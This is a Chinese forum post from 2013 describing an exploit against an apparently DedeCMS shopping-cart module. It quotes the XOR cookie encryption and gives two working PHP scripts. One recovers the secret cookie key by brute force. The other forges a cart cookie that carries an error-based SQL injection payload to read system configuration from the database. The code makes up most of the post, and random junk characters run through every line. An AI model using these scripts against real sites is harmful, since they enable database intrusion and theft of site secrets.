www.xxx.com/plus/search.php?keyword=; X! K$ K1 Z% l' Z& v" m
在 include/shopcar.class.php中
. P+ o/ N* j; n, O* E5 r先看一下这个shopcar类是如何生成cookie的
0 X4 c& l. r" Q5 o: @9 F; W$ R239 function saveCookie($key,$value)9 O( H. c$ A% O. w9 U# {
240 {' I0 B4 s- _% |8 F3 U. B
241 if(is_array($value))
( T! H+ R: _- I2 T# q242 {6 V, w; G% O/ B& X' d4 }2 M) E
243 $value = $this->enCrypt($this->enCode($value));
+ G6 t, s: w( c) t& M& U+ S244 }9 i0 ^8 M+ ~# O. h% K- p
245 else% K2 o% Z6 j6 X$ {' y4 Y/ E
246 {
* }$ J1 D; X( z2 ?5 S, a247 $value = $this->enCrypt($value);
+ V1 x% F- O! \ }7 n; O- w q248 }3 x9 U# ?. K6 a. W' Y* a
249 setcookie($key,$value,time()+36000,’/');
0 M' L; ?5 h8 [; q2 X250 }; g; v, R- |8 \' X
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
1 [. [9 a/ b/ w0 r186 function enCrypt($txt)
6 B' F' Q2 P' z. N187 {
- b6 {; g: y( g% n2 K188 srand((double)microtime() * 1000000);6 q8 R* Z8 a( U0 L8 K
189 $encrypt_key = md5(rand(0, 32000));1 X+ f6 b6 K0 R( {7 B
190 $ctr = 0;: u9 O) Y W. V3 ]+ H1 o
191 $tmp = ”;
# E7 T' ?7 B$ n& j192 for($i = 0; $i < strlen($txt); $i++)# k. k3 q0 j6 }) L& G
193 {6 d6 C/ l0 J$ F) e
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 `( y+ C/ Y( e) X I, r: O. ~. T6 X7 m
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ i, @& b! l% z2 B
196 }) y n$ V; S- M- U, d
197 return base64_encode($this->setKey($tmp));. B$ L E1 g' J0 o; {
198 }. x$ E) e; F) O( K
213 function setKey($txt)
* V4 t3 B( _$ a! h2 q214 {
8 R* H( t) |' f/ u: o& X215 global $cfg_cookie_encode;
3 r- ^- f H" k }5 |216 $encrypt_key = md5(strtolower($cfg_cookie_encode));/ X' u. t8 w% g& M; |
217 $ctr = 0;
4 E4 {/ z' F4 c3 V218 $tmp = ”;
: X8 S) h* e% p& U$ L219 for($i = 0; $i < strlen($txt); $i++)3 k% v; X1 g+ y
220 {" Q* q O3 M3 g- R6 v7 f. k2 ^
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;5 ~% s% \7 @! W' ]' V' j
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 {3 t* w& n. C& \/ n
223 }' b: R6 h7 v# |6 _
224 return $tmp;
8 u+ J4 i4 ~" b225 }% h& Z1 N: t4 e+ z. |
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的- x* ^; ?% u6 {! b* j2 w7 ]
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。: O% ^" s& _0 Z* R+ K& J
具体代码如下:
9 U5 @# Y; ?3 c" P<?php+ h. e# J n* \+ A; T8 F% Z$ w
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here8 f, P; u& d5 F$ Y' A- \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
7 J' U. J0 P) s# [- k0 p8 |. U$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here8 ^. ~0 A3 y) L$ x/ k9 R6 x
function reStrCode($code,$string)
( y9 d8 L5 Y6 B; V+ h, C- F" N{
# ~2 H d1 {, ?! ~$code = base64_decode($code);* c" R: j. S0 I" S5 D
$key = “”;
+ a+ ]; _1 j+ s' |+ ]6 Hfor($i=0 ; $i<32 ; $i++)2 V. b8 d2 k$ l& I3 M2 u: Q5 G
{7 x. x5 B+ k/ {6 N8 e! I
$key .= $string[$i] ^ $code[$i];8 e( c$ ^( r/ {) w% q" C! a
}4 K$ s; v6 n" q" v" g# n9 i
return $key; M1 ^" ?+ X6 w4 r
}
8 V, z; U. t# K0 P1 Yfunction getKeys($cookie,$plantxt). O; E; v! _$ ^5 w4 j- k" }2 n8 c. ?+ W
{: c, P, b; V5 A/ n; z# b( R
$tmp = $cookie;) Q8 A6 x6 K5 `# v7 G
$results = array();
3 U# g$ |/ ]" Hfor($j=0 ; $j < 32000; $j++)5 Y+ Y% O X P8 D& E% L
{- k0 `* s' {$ w
7 O! ?0 @" @& a- l* x. ?$txt = $plantxt; b6 H" Y$ _8 o8 i. c! X9 f; w
$ctr = 0;* x( G4 v h6 o3 C0 ^: t) J8 }
$tmp = ”;
' V$ B3 }3 y. ~4 D' a$encrypt_key = md5($j);
% Z: {+ q# t8 s1 B" {0 M& t9 E& Cfor($i =0; $i < strlen($txt); $i ++)* q) G4 |/ D4 x& Y0 G, j7 o3 i0 F
{( @. P, a, x' ]8 T8 z; V9 d+ t
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& }" N7 d- W5 @$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 C/ x) V2 N( G- v
}
1 C# S& D* `1 v" E' h' j$string = $tmp;2 U$ l: [+ p5 K2 c7 M* g. Q
$code = $cookie;9 Y: G" E* `3 g7 T! i. Q" L! N
$result = reStrCode($code,$string);
I$ y* q# b3 a8 pif(eregi(‘^[a-z0-9]+$’,$result))
4 A% P2 ]* w2 I* @' I) C{1 d' k/ _+ _, s% g& d
echo $result.”\n”;
1 M2 N' ?+ a4 ?* Z1 |/ r$results[] = $result;
- a& Q% v; Z6 }$ U$ K3 i. D}
$ J' }3 J" r& M# g}3 X C" Y0 y3 D0 R `3 X+ S0 ~
return $results;
: _/ N* a- u* f- B# I}
$ o. L# M& j" ^- K9 \" g$results1 = getKeys($cookie1,$plantxt);
2 U9 N/ M/ `" ^6 q& t5 _$results2 = getKeys($cookie2,$plantxt);. h& ^# P7 n/ I* T
print “\n——————–real key————————–\n”;! s1 W) ?- O- u6 |! l
foreach($results1 as $test1)
) v) u, H. v' f{- h* g" S1 W a+ N7 y
foreach($results2 as $test2)" m$ f9 t6 h, C7 J
{. t% g( M9 L8 @' l" F( J: _
if($test1 == $test2)
% |2 v2 F0 F9 t- }* o{* J1 Q5 C/ ?* [0 v2 |
echo $test1.”\n”;
5 a) @& _9 m, s}
0 H3 U- N' y. v" J}1 r! n, A* q# Z, U% B
}; `5 G; y+ A4 |
?>
9 K1 u+ t' m: w7 U6 ?; u7 Scookie1 和 cookie2 是我下了两次订单后分别生成的cookie,% H3 `1 \' b% \/ r. z) i
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1- H) J9 B% p7 i$ I8 B
然后推算出md5(strtolower($cfg_cookie_encode))
& P t) _2 c: e* _得到这个key之后,我们就可以构造任意购物车的cookie
2 |/ }* @! Q0 G8 S- d接着看
- a* c h+ S0 o3 n2 M& P9 V( S20 class MemberShops$ D) p8 L6 n: J* g" V
21 {
0 o! X/ R$ c2 \: i) v5 r22 var $OrdersId;2 ^2 W t5 `+ d- e7 w; V
23 var $productsId;) q5 f& z2 O; Z4 N, U7 H* l3 x( S. C
24
; C! i5 C7 N) q2 N; ~: W; D9 p4 z2 W25 function __construct()* g2 {9 A8 j0 m' E% j# y, O, \
26 {+ F+ W5 o% c& O) Y' Y
27 $this->OrdersId = $this->getCookie(“OrdersId”);
1 y* U: ?: {$ O! k. }' \: @28 if(empty($this->OrdersId))
$ z3 O) Y8 L3 X" y7 Y2 o29 {
1 A! a$ a- f/ }' o9 U30 $this->OrdersId = $this->MakeOrders();
; K; p( W. p# o6 a6 T31 }
3 h6 e% G; P/ ?32 }1 m# C) y9 ]3 f; j. ]
发现OrderId是从cookie里面获取的; m% _7 q1 C# G
然后
" v$ |3 T3 x3 @. }6 q# A3 ^/plus/carbuyaction.php中的
8 B. Y. O3 y1 L1 B6 e, F29 $cart = new MemberShops();
; L9 _! ~2 k w: M. h# j39 $OrdersId = $cart->OrdersId; //本次记录的订单号0 L! u, ] {+ F* | Z2 |! u+ S
……
6 y3 l/ s* ^% y+ A' Y5 d. r173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
/ }7 q6 _5 B0 q. ?! i0 A接着我们就可以注入了
. j# E1 t3 ?! G) u$ l _通过利用下面代码生成cookie:
; R1 h& F4 ]9 Y" v w<?php3 J. F5 x# J0 b6 y0 `/ g: c
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
, N9 L6 L8 O2 Q3 t$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
8 j8 m `) ~0 ifunction setKey($txt)
4 j# F: {% b7 w, u, C{
+ D; e& _8 Y# c5 jglobal $encrypt_key; g6 t; n$ e) _7 I# w" T! V
$ctr = 0;
% s5 c8 c" u" {1 b/ \$tmp = ”;
, B0 O4 d/ s$ T' h; ?8 yfor($i = 0; $i < strlen($txt); $i++)4 K& t. D/ l1 A5 Q% [
{ @. X, o- D9 M: h- R
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; \: Y6 _" p2 z! R+ a: H0 P V
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];. g) B0 @ N2 ~" t8 J
} u* }/ ?4 A; q/ j5 k5 U w" P
return $tmp;+ f: X1 J' t; k# [
}
1 C0 L5 u0 ?; x2 @! }5 e" R8 y" m) k! pfunction enCrypt($txt), Y$ |! `! }5 ^3 \$ t
{
3 c2 S$ M/ r3 Z/ n7 x2 ^1 Wsrand((double)microtime() * 1000000);9 U) g# z' J% J& F2 [5 h
$encrypt_key = md5(rand(0, 32000));
1 a) B2 T6 x0 z) v; ?3 Z, V$ctr = 0;8 d+ O. G: i4 \ g5 P* f9 ^
$tmp = ”;
* j! [9 `$ ^3 M8 Qfor($i = 0; $i < strlen($txt); $i++)
v: j- {) y! [, R{
5 g6 ]3 H! M/ {" \$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
7 u- R2 X( e, A5 N" c' ~% v$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 l5 C/ m% S0 T# Z- \" m4 _, O3 ]0 d
}. S* i+ R8 A: t
return base64_encode(setKey($tmp));+ P+ \; e' Y/ i3 o$ G
}
+ d7 C/ [% V. j0 V$ y. Pfor($dest =0;$dest = enCrypt($txt);)/ L2 p7 S) p) o" q! C
{! z9 r4 r* w8 l. n
if(!strpos($dest,’+'))% O9 t9 s$ A9 \7 O) v5 H
{
; @$ m4 o" ]4 }% D hbreak;( c& j6 R8 O2 A2 ~. H
}
8 a$ s1 q# ~* V! f4 D6 V} S+ P5 w- p9 a) n' [6 T
echo $dest.”\n”;/ L1 F5 h, h$ U% f: x: b
?>
2 ?3 H! g* V* q- k1 a; [
$ m0 H* N% ~3 r( h3 Y |
发表于 2013-2-13 23:58:29
收藏
支持
反对